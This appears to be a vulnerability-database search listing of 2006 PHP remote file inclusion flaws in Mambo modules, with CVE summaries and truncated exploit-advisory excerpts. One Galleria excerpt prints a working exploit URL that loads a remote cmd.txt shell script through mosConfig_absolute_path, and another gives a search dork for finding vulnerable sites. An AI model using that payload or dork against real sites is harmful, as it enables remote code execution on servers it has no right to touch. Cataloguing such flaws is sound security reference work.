43 matches found
CVE-2006-3843
The CVE-2006-3843 entry concerns a PHP remote file inclusion vulnerability in Calendar Mambo Module (com_calendar.php) up to version 1.5.7 and earlier. The identified flaw allows a remote attacker to execute arbitrary PHP code by supplying a URL in the absolute_path parameter. Affected software i...
CVE-2006-3843
PHP remote file inclusion vulnerability in comcalendar.php in Calendar Mambo Module 1.5.7 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the absolutepath parameter...
Mambo Module Calendar 1.5.7 - Com_Calendar.php Remote File Inclusion
Mambo Module Calendar 1.5.7 - ComCalendar.php Remote File Inclusion source: https://www.securityfocus.com/bid/19027/info The Calendar module for Mambo is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An...
Mambo Component ExtCalendar 2.0 - Remote File Inclusion
Mambo Component ExtCalendar 2.0 - Remote File Inclusion -------------------------------------------------------------------------------- Title : ExtCalendar Mambo Module = v2 Remote File Include Vulnerabilities Discovered By OLiBekaS...
Mambo Module HTMLArea3 1.5 - Remote File Inclusion
HTMLArea3 addon - ImageManager Author : Ahmad Maulana a.k.a Matdhule Date : July 12th 2006 Location : Indonesia, Jakarta Web : http://advisories.echo.or.id/adv/adv38-matdhule-2006.txt Critical Lvl : Highly critical Impact : System access Where : From Remote...
Mambo Component ExtCalendar 2.0 - Remote File Inclusion
-------------------------------------------------------------------------------- Title : ExtCalendar Mambo Module = v2 Remote File Include Vulnerabilities Discovered By OLiBekaS ----------------------------------------------------------------------------- dork : "powered by ExtCalendar v2" Exploi...
CVE-2006-3528
Multiple PHP remote file inclusion vulnerabilities in Simpleboard Mambo module 1.1.0 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the sbp parameter to 1 imageupload.php and 2 fileupload.php...
CVE-2006-3396
Summary : The vulnerability CVE-2006-3396 affects the Galleria component for Mambo (Galleria Mambo Module 1.0 and earlier). It is a PHP remote file inclusion in the script galleria.html.php via an unsafely used mosConfig_absolute_path parameter, which can let an attacker cause arbitrary PHP code ...
CVE-2006-3396
PHP remote file inclusion vulnerability in galleria.html.php in Galleria Mambo Module 1.0 and earlier for Mambo allows remote attackers to execute arbitrary PHP code via a URL in the mosConfigabsolutepath parameter...
galleria Mambo Module <= 1.0b Remote File Include Vulnerability
Exploit for unknown platform in category web applications =============================================================== galleria Mambo Module = 1.0b Remote File Include Vulnerability =============================================================== Title : galleria = 1.0 Remote File...
Mambo Module galleria 1.0b - Remote File Inclusion
Mambo Module galleria 1.0b - Remote File Inclusion Title : galleria = 1.0 Remote File InclusionVulnerability - URL : http://binarydigit.at/ - Author : sikunYuk - Mail : inealatgmail.com - exploit :...
Mambo Module galleria 1.0b - Remote File Inclusion
Title : galleria = 1.0 Remote File InclusionVulnerability - URL : http://binarydigit.at/ - Author : sikunYuk - Mail : inealatgmail.com - exploit : http://target/path/components/comgalleria/galleria.html.php?mosConfigabsolutepath=http://fckscript/cmd.txt?&cmd= - greatz :...
CVE-2006-3302
PHP remote file inclusion vulnerability in modcbsms.php in CBSMS Mambo Module 1.0 and earlier, when registerglobals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the mosCapath parameter. NOTE: the provenance of this information is unknown; portions of the details...
CVE-2006-3294
PHP remote file inclusion vulnerability in modcbsmsmessages.php in CBSMS Mambo Module 1.0 and earlier, when registerglobals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the mosConfigabsolutepath parameter...
CVE-2006-3302
PHP remote file inclusion vulnerability in modcbsms.php in CBSMS Mambo Module 1.0 and earlier, when registerglobals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the mosCapath parameter. NOTE: the provenance of this information is unknown; portions of the details...
CVE-2006-3302
The CVE describes a PHP remote file inclusion in CBSMS Mambo Module 1.0 and earlier. When register_globals is enabled, an attacker can inject a URL via the mosC_a_path parameter to execute arbitrary PHP code on the affected system. Connected documents corroborate the vulnerability class and note ...
CVE-2006-3294
The CBSMS Mambo Module (1.0 and earlier) contains a PHP remote file inclusion in mod_cbsms_messages.php. The vulnerability arises when register_globals is enabled and an attacker supplies a URL in mosConfig_absolute_path, enabling arbitrary PHP code execution. Root cause: lack of input sanitizati...
cbsms.txt
--------------------------------------------------------------------------- CBSMS Mambo Module = 1.0 mosConfigabsolutepath Remote File Include Vulnerabilities --------------------------------------------------------------------------- Discovered By Kw3RLn Romanian Security Team Remote : Yes...
CBSMS Mambo Module <= 1.0 Remote File Include Vulnerability
No description provided by source. --------------------------------------------------------------------------- CBSMS Mambo Module = 1.0 mosConfigabsolutepath Remote File Include Vulnerabilities --------------------------------------------------------------------------- Discovered By Kw3RLn Romani...
CBSMS Mambo Module <= 1.0 Remote File Include Vulnerability
Exploit for unknown platform in category web applications =========================================================== CBSMS Mambo Module = 1.0 Remote File Include Vulnerability ===========================================================...